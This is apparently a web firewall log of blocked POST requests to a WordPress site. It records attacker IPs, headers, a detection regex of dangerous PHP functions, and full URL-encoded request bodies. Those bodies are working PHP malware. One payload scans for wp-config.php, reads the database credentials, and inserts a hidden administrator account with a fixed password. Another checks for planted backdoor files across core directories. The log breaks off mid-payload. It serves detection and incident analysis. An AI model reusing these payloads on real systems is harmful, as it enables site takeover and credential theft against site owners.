s\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/class-wp-taxonomy.php%22%3D%3E%22bd%40%40320334573%40%4023%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20"]
["2026-05-16 06:02:22","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Fy:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvEaxvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvrS9wo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-length:12640\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nhost:dewenlabels.com\nsec-fetch-mode:navigate\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-dest:document\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-user:?1\n\nFy=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:02:39","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fd:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bW